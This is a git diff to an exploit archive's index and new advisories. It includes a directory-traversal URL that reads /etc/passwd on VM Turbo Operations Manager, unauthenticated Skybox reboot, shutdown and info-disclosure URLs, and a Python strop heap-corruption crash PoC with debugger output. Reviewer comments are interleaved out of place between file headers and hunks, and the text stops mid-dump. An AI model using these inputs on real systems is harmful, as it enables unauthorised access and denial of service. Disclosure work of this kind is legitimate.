diff --git a/files.csv b/files.csv
index c7c304e48..e4ca6e916 100755
--- a/files.csv
+++ b/files.csv
@@ -8845,7 +8845,7 @@ id,file,description,date,author,platform,type,port
 9371,platforms/php/webapps/9371.txt,"opennews 1.0 (sqli/rce) Multiple Vulnerabilities",2009-08-05,SirGod,php,webapps,0
 9372,platforms/php/webapps/9372.txt,"Portel 2008 - (decide.php patron) Blind SQL Injection Vulnerability",2009-08-05,"Chip d3 bi0s",php,webapps,0
 9373,platforms/freebsd/dos/9373.c,"FreeBSD 7.2-RELEASE SCTP Local Kernel Denial of Service Exploit",2009-08-06,"Shaun Colley",freebsd,dos,0
-9375,platforms/windows/local/9375.py,"JetAudio 7.1.9.4030 Universal Stack Overflow Exploit (SEH)",2009-08-06,Dr_IDE,windows,local,0
+9375,platforms/windows/local/9375.py,"JetAudio 7.1.9.4030 (.m3u) - Universal Stack Overflow Exploit (SEH)",2009-08-06,Dr_IDE,windows,local,0
 9376,platforms/windows/dos/9376.py,"jetAudio <= 7.5.5 plus vx (M3U/ASX/WAX/WVX) Local Crash PoC",2009-09-10,Dr_IDE,windows,dos,0
 9377,platforms/windows/local/9377.pl,"A2 Media Player Pro 2.51 (.m3u /m3l) Universal Local BOF Exploit (SEH)",2009-08-06,hack4love,windows,local,0
 9378,platforms/php/webapps/9378.txt,"PHP Script Forum Hoster (Topic Delete/XSS) Multiple Vulnerabilities",2009-08-06,int_main();,php,webapps,0
@@ -9873,7 +9873,7 @@ id,file,description,date,author,platform,type,port
 10647,platforms/php/webapps/10647.txt,"VideoIsland Remote shell upload Vulnerability",2009-12-24,RENO,php,webapps,0
 10648,platforms/php/webapps/10648.txt,"cms -db <= 0.7.13 - Multiple Vulnerabilities",2009-12-25,"cp77fk4r ",php,webapps,0
 10649,platforms/windows/webapps/10649.html,"SoftCab Sound Converter ActiveX Insecure Method Exploit (sndConverter.ocx)",2009-12-25,"ThE g0bL!N",windows,webapps,0
-10650,platforms/windows/dos/10650.pl,"jetAudio 8.0.0.0 - Basic Local Crash PoC",2009-12-25,"D3V!L FUCKER",windows,dos,0
+10650,platforms/windows/dos/10650.pl,"jetAudio 8.0.0.0 (.asx) - Basic Local Crash PoC",2009-12-25,"D3V!L FUCKER",windows,dos,0
 10651,platforms/windows/dos/10651.pl,"JetAudio Basic 7.5.5.25 .asx Buffer Overflow PoC",2009-12-25,"D3V!L FUCKER",windows,dos,0
 10652,platforms/php/webapps/10652.txt,"asaher pro 1.0 RFI Vulnerability",2009-12-25,indoushka,php,webapps,0
 10653,platforms/php/webapps/10653.txt,"Winn Guestbook 2.4, Winn.ws - Cross Site Scripting Vulnerability",2009-12-25,indoushka,php,webapps,0
@@ -10278,7 +10278,7 @@ id,file,description,date,author,platform,type,port
 11204,platforms/windows/remote/11204.html,"AOL 9.5 ActiveX 0day Exploit (heap spray)",2010-01-20,Dz_attacker,windows,remote,0
 11205,platforms/windows/local/11205.pl,"MP3 Studio 1.x - (.m3u File) Local Stack Overflow (Universal)",2010-01-20,"D3V!L FUCKER",windows,local,0
 11208,platforms/windows/local/11208.pl,"jetAudio 8.0.0.2 Basic (m3u) Stack Overflow Exploit",2010-01-21,"cr4wl3r ",windows,local,0
-11209,platforms/windows/dos/11209.pl,"jetAudio 8.0.0.2 Basic Local Crash Exploit",2010-01-21,"cr4wl3r ",windows,dos,0
+11209,platforms/windows/dos/11209.pl,"jetAudio 8.0.0.2 Basic (.asx) - Local Crash Exploit",2010-01-21,"cr4wl3r ",windows,dos,0
 11210,platforms/windows/remote/11210.rb,"EFS Easy Chat server Universal BOF-SEH (Meta)",2010-01-21,fb1h2s,windows,remote,0
 11211,platforms/multiple/webapps/11211.txt,"cPanel HTTP Response Splitting Vulnerability",2010-01-21,Trancer,multiple,webapps,0
 11212,platforms/asp/webapps/11212.txt,"eWebeditor Directory Traversal",2010-01-21,N/A,asp,webapps,0
@@ -29250,7 +29250,7 @@ id,file,description,date,author,platform,type,port
 32479,platforms/php/webapps/32479.txt,"BigDump 0.35b - Arbitrary Upload",2014-03-24,"felipe andrian",php,webapps,0
 32481,platforms/windows/dos/32481.txt,"Light Audio Player 1.0.14 - Memory Corruption PoC",2014-03-24,"TUNISIAN CYBER",windows,dos,0
 32482,platforms/windows/dos/32482.py,"GOM Media Player (GOMMP) 2.2.56.5183 - Memory Corruption PoC",2014-03-24,"TUNISIAN CYBER",windows,dos,0
-32483,platforms/windows/dos/32483.py,"GOM Video Converter 1.1.0.60 - Memory Corruption PoC",2014-03-24,"TUNISIAN CYBER",windows,dos,0
+32483,platforms/windows/dos/32483.py,"GOM Video Converter 1.1.0.60 (.wav) - Memory Corruption PoC",2014-03-24,"TUNISIAN CYBER",windows,dos,0
 32485,platforms/asp/webapps/32485.txt,"ASP Indir Iltaweb Alisveris Sistemi 'xurunler.asp' SQL Injection Vulnerability",2008-10-13,tRoot,asp,webapps,0
 32486,platforms/php/webapps/32486.txt,"Webscene eCommerce 'productlist.php' SQL Injection Vulnerability",2008-10-14,"Angela Chang",php,webapps,0
 32487,platforms/php/webapps/32487.txt,"Elxis CMS 2008.1 modules/mod_language.php Multiple Parameter XSS",2008-10-14,faithlove,php,webapps,0
@@ -29976,6 +29976,8 @@ id,file,description,date,author,platform,type,port
 33247,platforms/hardware/webapps/33247.txt,"OpenFiler 2.99.1 - Arbitrary Code Execution",2014-05-08,"Dolev Farhi",hardware,webapps,0
 33248,platforms/hardware/webapps/33248.txt,"OpenFiler 2.99.1 - Multiple persistent XSS Vulnerabilities",2014-05-08,"Dolev Farhi",hardware,webapps,0
 33249,platforms/php/webapps/33249.txt,"Collabtive 1.2 - SQL Injection",2014-05-08,"Deepak Rathore",php,webapps,0
+33250,platforms/php/webapps/33250.txt,"Collabtive 1.2 - Stored XSS",2014-05-08,"Deepak Rathore",php,webapps,0
+33251,platforms/multiple/local/33251.txt,"Python - Interpreter Heap Memory Corruption (PoC)",2014-05-08,"Debasish Mandal",multiple,local,0
 33252,platforms/php/webapps/33252.txt,"Cobbler 2.4.x - 2.6.x - LFI Vulnerability",2014-05-08,"Dolev Farhi",php,webapps,0
 33254,platforms/java/webapps/33254.txt,"IBM Lotus Connections 2.0.1 'simpleSearch.do' Cross Site Scripting Vulnerability",2009-09-23,IBM,java,webapps,0
 33255,platforms/linux/local/33255.txt,"Xen 3.x pygrub Local Authentication Bypass Vulnerability",2009-09-25,"Jan Lieskovsky",linux,local,0
@@ -30038,3 +30040,12 @@ id,file,description,date,author,platform,type,port
 33320,platforms/php/webapps/33320.txt,"TFTgallery 0.13 'sample' Parameter Cross Site Scripting Vulnerability",2009-11-02,blake,php,webapps,0
 33321,platforms/linux/local/33321.c,"Linux Kernel 2.6.x 'pipe.c' Local Privilege Escalation Vulnerability (1)",2009-11-03,"teach & xipe",linux,local,0
 33322,platforms/linux/local/33322.c,"Linux Kernel 2.6.x pipe.c Local Privilege Escalation Vulnerability (2)",2009-11-03,"teach & xipe",linux,local,0
+33326,platforms/windows/remote/33326.py,"Easy Chat Server 3.1 - Stack Buffer Overflow",2014-05-12,superkojiman,windows,remote,0
+33327,platforms/hardware/webapps/33327.txt,"Skybox Security 6.3.x - 6.4.x - Multiple Information Disclosure",2014-05-12,"Luigi Vezzoso",hardware,webapps,0
+33328,platforms/hardware/dos/33328.txt,"Skybox Security 6.3.x - 6.4.x - Multiple Denial Of Service Issue",2014-05-12,"Luigi Vezzoso",hardware,dos,0
+33330,platforms/windows/webapps/33330.txt,"SpiceWorks 7.2.00174 - Persistent XSS Vulnerabilities",2014-05-12,"Dolev Farhi",windows,webapps,80
+33331,platforms/windows/remote/33331.rb,"Yokogawa CS3000 BKESimmgr.exe Buffer Overflow",2014-05-12,metasploit,windows,remote,34205
+33332,platforms/windows/dos/33332.py,"JetAudio 8.1.1 (.ogg) - Crash PoC",2014-05-12,"Aryan Bayaninejad",windows,dos,0
+33333,platforms/windows/remote/33333.rb,"Adobe Flash Player Shader Buffer Overflow",2014-05-12,metasploit,windows,remote,0
+33334,platforms/cgi/webapps/33334.txt,"VM Turbo Operations Manager 4.5x - Directory Traversal",2014-05-12,"Jamal Pecou",cgi,webapps,80
+33335,platforms/windows/dos/33335.py,"GOM Player 2.2.57.5189 (.ogg) - Crash PoC",2014-05-12,"Aryan Bayaninejad",windows,dos,0
diff --git a/platforms/cgi/webapps/33334.txt b/platforms/cgi/webapps/33334.txt
new file mode 100755
index 000000000..af9e1d977
--- /dev/null
+++ b/platforms/cgi/webapps/33334.txt
@@ -0,0 +1,33 @@
+Product: VM Turbo Operations Manager
+Vendor: VM Turbo
+Vulnerable Version(s): 4.5.x earlier
+Tested Version: 4.0
+Advisory Publication: April 11, 2014
+Vendor Notification: April 11, 2014
+Public Disclosure: May 8, 2014
+Vulnerability Type: Directory Traversal
+
+Discovered and Provided: (Jamal Pecou) Security Focus ( https://www.securityfocus.com/ )
+
+------------------------------------------------------------------------
+-----------------------
+
+Advisory Details:
+
+A vulnerability affecting “/cgi-bin/help/doIt.cgi" in VM Turbo Operations Manager allows directory traversal when the URL encoded POST input “xml_path” was set to “../../../../../../../../../../etc/passwd” we could see the contents of this file.
+
+
+The following exploitation example displays the contents of /etc/passwd
+
+http://[host]/cgi-bin/help/doIt.cgi?FUNC=load_xml_file&xml_path=../../../../../../../../../../etc/passwd
+
+------------------------------------------------------------------------
+-----------------------
+
+Solution:
+
+ The vendor has released a fix for this vulnerability in version 4.6.
+
+References:
+
+[1] https://support.vmturbo.com/hc/en-us/articles/203170127-VMTurbo-Operations-Manager-v4-6-Announcement
\ No newline at end of file
diff --git a/platforms/hardware/dos/33328.txt b/platforms/hardware/dos/33328.txt
new file mode 100755
index 000000000..9f11db8c1
--- /dev/null
+++ b/platforms/hardware/dos/33328.txt
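Review bot: The version lines at the top of 33334.txt contradict each other and the request description does not match the example: `+Vulnerable Version(s): 4.5.x earlier` reads as a truncated "4.5.x and earlier" (the files.csv row says "4.5x"), `+Tested Version: 4.0` is then outside the stated range only by wording, and the Advisory Details call `xml_path` a "URL encoded POST input" while the only example given passes it in a GET query string. Suggest `+Vulnerable Version(s): 4.5.x and earlier` and rewording the sentence to "the `xml_path` parameter (sent as a URL-encoded POST body or, as shown below, in the query string)" so that readers checking affected installs and writing detections for this path have an unambiguous record. The Solution section already names 4.6 as the fixed release, which the index entry does not carry; consider adding "(fixed in 4.6)" to the CSV description as well.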
@@ -0,0 +1,42 @@
+# Exploit Title: [SKYBOX Security - DDOS]
+
+# Date: [22-Jan-2014]
+# Exploit Author: [Luigi Vezzoso]
+# Vendor Homepage: [http://www.skyboxsecurity.com]
+# Version: [Skybox View Appliances with ISO versions: 6.3.33-2.14,
+6.3.31-2.14, 6.4.42-2.54, 6.4.45-2.56, 6.4.46-2.57]
+# Tested on: [Centos 6.4 kernel 2.6.32]
+# CVE : [CVE-2014-2085]
+
+#OVERVIEW
+A vulnerability has been found in some Skybox View Appliances’ Admin
+interfaces which would allow a potential malicious party to bypass
+the authentication mechanism and execute reboot and/or shutdown of
+appliance self
+
+#INTRODUCTION
+Skybox Security has a complete portfolio of security management
+tools that deliver the security intelligence needed to act fast to
+minimize risks and eliminate attack vectors. Based on a powerful
+risk analytics platform that links data from vulnerability scanners,
+threat intelligence feeds, firewalls and other network infrastructure
+devices – Skybox gives you context to prioritize risks accurately and
+automatically, in minutes.
+
+#VULNERABILITY DESCRIPTION
+It's possible to open and execute the reboot and shutdown script
+without autentication at the following links:
+https://1.1.1.1:444/scripts/commands/reboot?_=1111111111
+https://1.1.1.1:444/scripts/commands/shutdown?_=1111111111
+#VERSIONS AFFECTED
+Skybox View Appliances with ISO versions: 6.3.33-2.14, 6.3.31-2.14,
+6.4.42-2.54, 6.4.45-2.56, 6.4.46-2.57
+
+#SOLUTION
+Please refer to the vendor security advisor: Security Advisory 2014-
+3-25-1
+
+#CREDITS
+Luigi Vezzoso
+email: luigivezzoso@gmail.com
+skype: luigivezzoso
\ No newline at end of file
diff --git a/platforms/hardware/webapps/33327.txt b/platforms/hardware/webapps/33327.txt
new file mode 100755
index 000000000..3207b04d0
--- /dev/null
+++ b/platforms/hardware/webapps/33327.txt
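Review bot: The title `# Exploit Title: [SKYBOX Security - DDOS]` does not describe the issue the body reports: the OVERVIEW and VULNERABILITY DESCRIPTION sections say the reboot and shutdown scripts under the appliance's admin interface are reachable without authentication, which is a missing-authentication flaw whose impact is a (single-host) denial of service, not a distributed one. The files.csv row added for 33328 already calls it "Multiple Denial Of Service Issue", so the header should agree with the index; `# Exploit Title: [SKYBOX Security - Unauthenticated Reboot/Shutdown (Denial of Service)]` would do. The companion 33327.txt shares this header block and the same vendor advisory reference, and its title does match its content.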
@@ -0,0 +1,48 @@
+# Exploit Title: [SKYBOX Security – Multiple
+Information Disclosure]
+
+# Date: [22-Jan-2014]
+# Exploit Author: [Luigi Vezzoso]
+# Vendor Homepage: [http://www.skyboxsecurity.com]
+# Version: [Skybox View Appliances with ISO versions: 6.3.33-2.14,
+6.3.31-2.14, 6.4.42-2.54, 6.4.45-2.56, 6.4.46-2.57]
+# Tested on: [Centos 6.4 kernel 2.6.32]
+# CVE : [CVE-2014-2084]
+
+#OVERVIEW
+A vulnerability has been found in some Skybox View Appliances’ Admin
+interfaces which would allow a potential malicious party to bypass
+the authentication mechanism and obtain read-only access to the
+appliance’s administrative menus. This would allow the malicious
+party to read system-related information such as interface names, IP
+addresses and the appliance status.
+
+#INTRODUCTION
+Skybox Security has a complete portfolio of security management
+tools that deliver the security intelligence needed to act fast to
+minimize risks and eliminate attack vectors. Based on a powerful
+risk analytics platform that links data from vulnerability scanners,
+threat intelligence feeds, firewalls and other network infrastructure
+devices – Skybox gives you context to prioritize risks accurately and
+automatically, in minutes.
+
+#VULNERABILITY DESCRIPTION
+It's possible to obtain useful information about the version and
+network configuration of skybox appliances bypassing the webui
+interface.
+For the appliance system info open with a browser:
+https://1.1.1.1:444/scripts/commands/getSystemInformation?_=111111111
+For the appliance network info open with a browser:
+https://1.1.1.1:444/scripts/commands/getNetworkConfigurationInfo
+#VERSIONS AFFECTED
+Skybox View Appliances with ISO versions: 6.3.33-2.14, 6.3.31-2.14,
+6.4.42-2.54, 6.4.45-2.56, 6.4.46-2.57
+
+#SOLUTION
+Please refer to the vendor security advisor: Security Advisory 2014-
+3-25-1
+
+#CREDITS
+Luigi Vezzoso
+email: luigivezzoso@gmail.com
+skype: luigivezzoso
\ No newline at end of file
diff --git a/platforms/multiple/local/33251.txt b/platforms/multiple/local/33251.txt
new file mode 100755
index 000000000..c8ba04c1f
--- /dev/null
+++ b/platforms/multiple/local/33251.txt
@@ -0,0 +1,1202 @@
+# Title: Python Interpreter Heap Memory Corruption
+# Date: Sun, 30 Mar 2014 20:09:44 -0400
+# Vulnerability Discovered By : Unknown
+# Proof of Concept : Debasish Mandal (https://twitter.com/debasishm89)
+# Software Link: https://www.python.org/
+# Version: All , Fix released (http://hg.python.org/cpython/rev/5dabc2d2f776)
+# Tested on: Microsoft Windows XP Professional SP2 EN (32bit)
+
+Recentl a new fix has been pushed to official python source code repository which fixes (http://hg.python.org/cpython/rev/5dabc2d2f776
+) a memory corruption vulnerability in python interpreter's strop module. The vulnerability lies in expandtabs() functions.
+This is due to a missing check in line 626,627 of /Modules/stropmodule.c.
+
+Vulnerable Code:
+
+https://github.com/pgbovine/Py2crazy/blob/master/Python-2.7.5/Modules/stropmodule.c#L627
+
+------------------------------------------------------------------------------------------------------------
+ for (p = string; p < e; p++) {
+ if (*p == '\t') {
+ j += tabsize - (j%tabsize);
+ if (old_j > j) {
+ PyErr_SetString(PyExc_OverflowError,
+ "new string is too long");
+ return NULL;
+ }
+ old_j = j;
+ } else {
+ j++;
+ if (*p == '\n') {
+ // Missing check
+ i += j;
+ j = 0;
+ }
+ }
+ }
+------------------------------------------------------------------------------------------------------------
+
+Patch Diff:
+http://hg.python.org/cpython/diff/5dabc2d2f776/Modules/stropmodule.c
+
+
+=================
+Proof of Concept:
+=================
+
+Running below code will crash the vulnerable python.exe process.
+
+import strop
+raw_input('Press Enter to BOOM!')
+a = '\t\n' * 65536
+strop.expandtabs(a, 65536)
+
+============================
+Crash Analysis using WinDBG:
+============================
+
+Microsoft (R) Windows Debugger Version 6.12.0002.633 X86
+Copyright (c) Microsoft Corporation. All rights reserved.
+
+*** wait with pending attach
+Symbol search path is: SRV*E:\symbol*http://msdl.microsoft.com/download/symbols
+Executable search path is:
+ModLoad: 1d000000 1d00a000 C:\Python27\python.exe
+ModLoad: 7c900000 7c9b0000 C:\WINDOWS\system32\ntdll.dll
+ModLoad: 7c800000 7c8f4000 C:\WINDOWS\system32\kernel32.dll
+ModLoad: 1e000000 1e227000 C:\WINDOWS\system32\python27.dll
+ModLoad: 77d40000 77dd0000 C:\WINDOWS\system32\USER32.dll
+ModLoad: 77f10000 77f56000 C:\WINDOWS\system32\GDI32.dll
+ModLoad: 77dd0000 77e6b000 C:\WINDOWS\system32\ADVAPI32.dll
+ModLoad: 77e70000 77f01000 C:\WINDOWS\system32\RPCRT4.dll
+ModLoad: 7c9c0000 7d1d4000 C:\WINDOWS\system32\SHELL32.dll
+ModLoad: 77c10000 77c68000 C:\WINDOWS\system32\msvcrt.dll
+ModLoad: 77f60000 77fd6000 C:\WINDOWS\system32\SHLWAPI.dll
+ModLoad: 78520000 785c3000 C:\WINDOWS\WinSxS\x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww_d08d0375\MSVCR90.dll
+ModLoad: 773d0000 774d2000 C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.2180_x-ww_a84f1ff9\comctl32.dll
+ModLoad: 5d090000 5d127000 C:\WINDOWS\system32\comctl32.dll
+(f0.320): Break instruction exception - code 80000003 (first chance)
+eax=7ffd6000 ebx=00000001 ecx=00000002 edx=00000003 esi=00000004 edi=00000005
+eip=7c901230 esp=023dffcc ebp=023dfff4 iopl=0 nv up ei pl zr na pe nc
+cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000246
+ntdll!DbgBreakPoint:
+7c901230 cc int 3
+0:001> g
+(f0.1f4): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+eax=20202020 ebx=0263bffe ecx=00003fff edx=00000001 esi=00010000 edi=025cf000
+eip=7855b37f esp=0021fce4 ebp=0021fd1c iopl=0 nv up ei pl nz na pe nc
+cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010206
+MSVCR90!memset+0x5f:
+7855b37f f3ab rep stos dword ptr es:[edi]
+
+We can see we have a write access violation at MSVCR90!memset+0x5f:
+
+Crash stack trace:
+
+0:000> kb
+*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\python27.dll -
+ChildEBP RetAddr Args to Child
+0021fce4 1e0483e2 025ceffd 00000020 00010000 MSVCR90!memset+0x5f
+WARNING: Stack unwind information not available. Following frames may be wrong.
+0021fd1c 1e08883b 00000000 022e7cd8 022eb5a8 python27!PyOS_AfterFork+0xc9f
+0021fd38 1e0bf781 022eb5a8 022e7cd8 00000000 python27!PyCFunction_Call+0x138
+0021fd60 1e0bcb94 1e0bd826 0021fdc4 01e280f8 python27!PyEval_GetFuncDesc+0x341
+0021fd64 1e0bd826 0021fdc4 01e280f8 02663ff0 python27!PyEval_EvalFrameEx+0x18e4
+0021fdd8 1e0be200 0021fe20 1e0be82e 02663eb8 python27!PyEval_EvalFrameEx+0x2576
+0021fde0 1e0be82e 02663eb8 00000000 0261e2c0 python27!PyEval_EvalCodeEx+0x50
+0021fe20 1e0bb295 01e280f8 01e1e6f0 01e1e6f0 python27!PyEval_EvalCodeEx+0x67e
+0021fe54 1e0e0d68 01e280f8 01e1e6f0 01e1e6f0 python27!PyEval_EvalCode+0x25
+0021fe70 1e0e0d36 0261e2c0 01de2ff3 01e1e6f0 python27!PyRun_FileExFlags+0x97
+0021fe9c 1e0e0329 785b7408 01de2ff3 00000101 python27!PyRun_FileExFlags+0x65
+0021fed8 1e0dff3e 785b7408 01de2ff3 00000001 python27!PyRun_SimpleFileExFlags+0x133
+0021fef8 1e02f5df 785b7408 01de2ff3 00000001 python27!PyRun_AnyFileExFlags+0x4c
+*** ERROR: Module load completed but symbols could not be loaded for C:\Python27\python.exe
+0021ff7c 1d001160 00000002 01de2fd0 01d9ef80 python27!Py_Main+0x805
+0021ffc0 7c816d4f 00090000 01fa0cda 7ffd6000 python+0x1160
+0021fff0 00000000 1d0012a8 00000000 78746341 kernel32!BaseProcessStart+0x23
+
+We crashed inside MSVCR90!memset
+
+After that we restart the app and set
a break point at memset. + +0:001> bp MSVCR90!memset +0:001> g +Breakpoint 0 hit +eax=00aada58 ebx=00000014 ecx=00000014 edx=00000a98 esi=1e1e0658 edi=00aada58 +eip=7855b320 esp=0021fbe8 ebp=0021fc30 iopl=0 nv up ei pl nz na po nc +cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000202 +MSVCR90!memset: +7855b320 8b54240c mov edx,dword ptr [esp+0Ch] ss:0023:0021fbf4=00000014 + +Partial Dis assembly of memset caller: + +.text:1E0483D0 sub esi, edx +.text:1E0483D2 add [ebp+var_4], esi +.text:1E0483D5 test esi, esi +.text:1E0483D7 jle short loc_1E0483F8 +.text:1E0483D9 push esi ; Size +.text:1E0483DA push 20h ; Val +.text:1E0483DC push edi ; Dst +.text:1E0483DD call memset +.text:1E0483E2 add esp, 0Ch +.text:1E0483E5 add edi, esi +.text:1E0483E7 jmp short loc_1E0483F8 +.tex + +edi=00aada58 is pointing to destination where final string is getting copied. + +0:000> dd esp +0021fbe8 1e0978ad 00aada58 00000000 00000014 +0021fbf8 00a81310 1e0977a2 1e1e0658 1e075222 +0021fc08 1e1e0658 00000000 1e0977a2 1e0977dc +0021fc18 1e1e0658 00a81310 00000000 1e1e0658 +0021fc28 1e0977a2 00aa8e40 0021fc9c 1e0650fe +0021fc38 1e1e0658 00a81310 00000000 009aabf0 +0021fc48 00a81310 1e06518c 1e1e0658 00a81310 +0021fc58 00000000 009aabf0 00000000 1e0651d9 + + +0:000> !address 00aada58 + 00a80000 : 00a80000 - 0004b000 + Type 00020000 MEM_PRIVATE + Protect 00000004 PAGE_READWRITE + State 00001000 MEM_COMMIT + Usage RegionUsageHeap + Handle 00970000 + + +It's confirmed that the memset() is actually trying write to heap. After few calls to memset the python.exe process will crash. + +0:000> g +(7d8.44c): Access violation - code c0000005 (first chance) +First chance exceptions are reported before any exception handling. +This exception may be expected and handled. 
+eax=20202020 ebx=00adbf66 ecx=000037e1 edx=00000001 esi=00010000 edi=00b0e000 +eip=7855b37f esp=0021fce4 ebp=0021fd1c iopl=0 nv up ei pl nz na pe nc +cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010206 +MSVCR90!memset+0x5f: +7855b37f f3ab rep stos dword ptr es:[edi] + +========================================= +Verify memory corruption using bang heap: +========================================= + +0:000> !heap -s + Heap Flags Reserv Commit Virt Free List UCR Virt Lock Fast + (k) (k) (k) (k) length blocks cont. heap +----------------------------------------------------------------------------- +00240000 00000002 1024 32 32 8 1 1 0 0 L +00340000 00001002 64 24 24 13 1 1 0 0 L +00350000 00008000 64 12 12 10 1 1 0 0 +00930000 00001002 64 16 16 2 1 1 0 0 L +00950000 00001002 64 16 16 2 2 1 0 0 L +00970000 00001002 3136 1644 1656 33 3 2 0 0 L +----------------------------------------------------------------------------- + +0x00240000 is Default Process Heap. From the size of commited bytes we can say 0x00970000 handling a large number of data. + +0:000> !heap -a 00970000 +Index Address Name Debugging options enabled + 6: 00970000 + Segment at 00970000 to 00980000 (00010000 bytes committed) + Segment at 00980000 to 00a80000 (00100000 bytes committed) + Segment at 00a80000 to 00c80000 (0008b000 bytes committed) + Flags: 00001002 + ForceFlags: 00000000 + Granularity: 8 bytes + Segment Reserve: 00400000 + Segment Commit: 00002000 + DeCommit Block Thres: 00000200 + DeCommit Total Thres: 00002000 + Total Free Size: 000010df + Max. Allocation Size: 7ffdefff + Lock Variable at: 00970608 + Next TagIndex: 0000 + Maximum TagIndex: 0000 + Tag Entries: 00000000 + PsuedoTag Entries: 00000000 + Virtual Alloc List: 00970050 + UCR FreeList: 00970598 + FreeList Usage: 84091158 00001001 00000000 80000000 + FreeList[ 00 ] at 00970178: 00ac5eb8 . 00a6f8d8 + 00a6f8d0: 01008 . 00ad8 [00] - free + 00b0bf88: 10100 . 
10100 [20] - free + Unable to read nt!_HEAP_FREE_ENTRY structure at 20202018 + FreeList[ 03 ] at 00970190: 00a38ff0 . 00a57fe0 + 00a57fd8: 00048 . 00018 [00] - free + 00a38fe8: 00048 . 00018 [00] - free + FreeList[ 04 ] at 00970198: 009c1fe8 . 009c1fe8 + 009c1fe0: 00188 . 00020 [00] - free + FreeList[ 06 ] at 009701a8: 00acf128 . 00acf128 + 00acf120: 00130 . 00030 [00] - free + FreeList[ 08 ] at 009701b8: 00a58fb8 . 00a58fb8 + 00a58fb0: 00010 . 00040 [00] - free + FreeList[ 0c ] at 009701d8: 009cb980 . 009cb980 + 009cb978: 00010 . 00060 [00] - free + FreeList[ 10 ] at 009701f8: 009c7588 . 009c7588 + 009c7580: 00178 . 00080 [00] - free + FreeList[ 13 ] at 00970210: 00a2af50 . 00a2af50 + 00a2af48: 000c8 . 00098 [00] - free + FreeList[ 1a ] at 00970248: 00ac5a68 . 00ac5a68 + 00ac5a60: 00170 . 000d0 [00] - free + FreeList[ 1f ] at 00970270: 00a71990 . 00a71990 + 00a71988: 00188 . 000f8 [00] - free + FreeList[ 20 ] at 00970278: 00a78c78 . 00a78c78 + 00a78c70: 00188 . 00100 [00] - free + FreeList[ 2c ] at 009702d8: 009d8788 . 009d8788 + 009d8780: 001d0 . 00160 [00] - free + FreeList[ 7f ] at 00970570: 00a7a3c0 . 00a7a3c0 + 00a7a3b8: 00220 . 003f8 [00] - free + Segment00 at 00970640: + Flags: 00000000 + Base: 00970000 + First Entry: 00970680 + Last Entry: 00980000 + Total Pages: 00000010 + Total UnCommit: 00000000 + Largest UnCommit:00000000 + UnCommitted Ranges: (0) + + Heap entries for Segment00 in Heap 00970000 + 00970000: 00000 . 00640 [01] - busy (640) + 00970640: 00640 . 00040 [01] - busy (40) + 00970680: 00040 . 01808 [01] - busy (1800) + 00971e88: 01808 . 00220 [01] - busy (214) + 009720a8: 00220 . 00808 [01] - busy (800) + 009728b0: 00808 . 001c8 [01] - busy (1c0) + 00972a78: 001c8 . 00188 [01] - busy (180) + 00972c00: 00188 . 00010 [01] - busy (4) + 00972c10: 00010 . 00010 [01] - busy (4) + 00972c20: 00010 . 00010 [01] - busy (4) + 00972c30: 00010 . 00018 [01] - busy (10) + 00972c48: 00018 . 00020 [01] - busy (18) + 00972c68: 00020 . 
00018 [01] - busy (10) + 00972c80: 00018 . 00018 [01] - busy (10) + 00972c98: 00018 . 00028 [01] - busy (20) + 00972cc0: 00028 . 00018 [01] - busy (c) + 00972cd8: 00018 . 00010 [01] - busy (8) + 00972ce8: 00010 . 00228 [01] - busy (220) + 00972f10: 00228 . 00088 [01] - busy (7c) + 00972f98: 00088 . 00040 [01] - busy (34) + 00972fd8: 00040 . 00050 [01] - busy (43) + 00973028: 00050 . 00020 [01] - busy (13) + 00973048: 00020 . 00040 [01] - busy (31) + 00973088: 00040 . 00028 [01] - busy (1d) + 009730b0: 00028 . 00030 [01] - busy (24) + 009730e0: 00030 . 00020 [01] - busy (14) + 00973100: 00020 . 00020 [01] - busy (12) + 00973120: 00020 . 00018 [01] - busy (d) + 00973138: 00018 . 00040 [01] - busy (31) + 00973178: 00040 . 00028 [01] - busy (1e) + 009731a0: 00028 . 00020 [01] - busy (17) + 009731c0: 00020 . 00018 [01] - busy (e) + 009731d8: 00018 . 00098 [01] - busy (8a) + 00973270: 00098 . 00048 [01] - busy (39) + 009732b8: 00048 . 00028 [01] - busy (1b) + 009732e0: 00028 . 00050 [01] - busy (45) + 00973330: 00050 . 00020 [01] - busy (12) + 00973350: 00020 . 00020 [01] - busy (18) + 00973370: 00020 . 00028 [01] - busy (1e) + 00973398: 00028 . 00020 [01] - busy (13) + 009733b8: 00020 . 00020 [01] - busy (14) + 009733d8: 00020 . 00018 [01] - busy (f) + 009733f0: 00018 . 00020 [01] - busy (16) + 00973410: 00020 . 00030 [01] - busy (28) + 00973440: 00030 . 00030 [01] - busy (27) + 00973470: 00030 . 00028 [01] - busy (1b) + 00973498: 00028 . 00028 [01] - busy (19) + 009734c0: 00028 . 00040 [01] - busy (36) + 00973500: 00040 . 00020 [01] - busy (12) + 00973520: 00020 . 00808 [01] - busy (800) + 00973d28: 00808 . 00088 [01] - busy (80) + 00973db0: 00088 . 00088 [01] - busy (80) + 00973e38: 00088 . 00038 [01] - busy (30) + 00973e70: 00038 . 00030 [01] - busy (24) + 00973ea0: 00030 . 00018 [01] - busy (c) + 00973eb8: 00018 . 00060 [01] - busy (54) + 00973f18: 00060 . 00188 [01] - busy (180) + 009740a0: 00188 . 00608 [01] - busy (600) + 009746a8: 00608 . 
